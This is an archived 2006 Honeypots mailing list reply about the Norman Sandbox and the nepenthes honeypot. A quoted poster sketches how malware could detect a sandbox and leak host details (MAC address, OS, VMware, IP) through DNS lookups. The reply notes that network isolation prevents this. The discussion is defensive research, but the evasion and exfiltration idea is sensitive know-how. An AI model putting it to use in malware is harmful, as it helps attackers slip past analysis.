Honeypots mailing list archives
Re: Looking for Honeypots???
From: Thorsten Holz <thorsten.holz () mmweg rwth-aachen de>
Date: Thu, 06 Apr 2006 12:06:58 -0700
On 06.04.2006, at 10:55, David Jiménez Domínguez wrote:
One example is the submit-norman module in nepenthes... when the malware has anti-vmware techniques ( for example by looking for the vmware tools registry key o a mac address) the report sended by norman is useless...
Please note that the Norman Sandbox does not run under VMWare, so checking for registry keys will not help a given piece of malware :-) Consult the whitepaper about the Sandbox to learn more about it: http://sandbox.norman.no/pdf/03_sandbox%20whitepaper.pdf
In the near future could some one make a code to first inspect the characteristics of the "sandhost" where the malware is run, and make some DNS queries to a domain name where this information is shown???...for example: mac00-00-00-71-B4-AA.com so.win2k.net vmware.present.net ip.192.168.1.2.com this information is going to be sended to the bad guy by email and he could map the all the information he needed Do you know if It is posible?
Depends on how the sandbox is designed. If the sandbox is isolated from the Internet, there should be no communication flow. Certainly there could be some covert channel using the output of the sandbox, though....
Just my thoughts, Thorsten
Current thread:
- Looking for Honeypots??? David Jiménez Domínguez (Apr 05)
- Re: Looking for Honeypots??? Mark Ryan del Moral Talabis (Apr 05)
- Re: Looking for Honeypots??? David Jiménez Domínguez (Apr 06)
- Re: Looking for Honeypots??? Thorsten Holz (Apr 06)
- Re: Looking for Honeypots??? David Jiménez Domínguez (Apr 06)
- <Possible follow-ups>
- RE: Looking for Honeypots??? Roger A. Grimes (Apr 05)
- RE: Looking for Honeypots??? Mohd Rosli Saidin (Apr 06)
- RE: Looking for Honeypots??? Roger A. Grimes (Apr 09)
- Re: Looking for Honeypots??? Mark Ryan del Moral Talabis (Apr 05)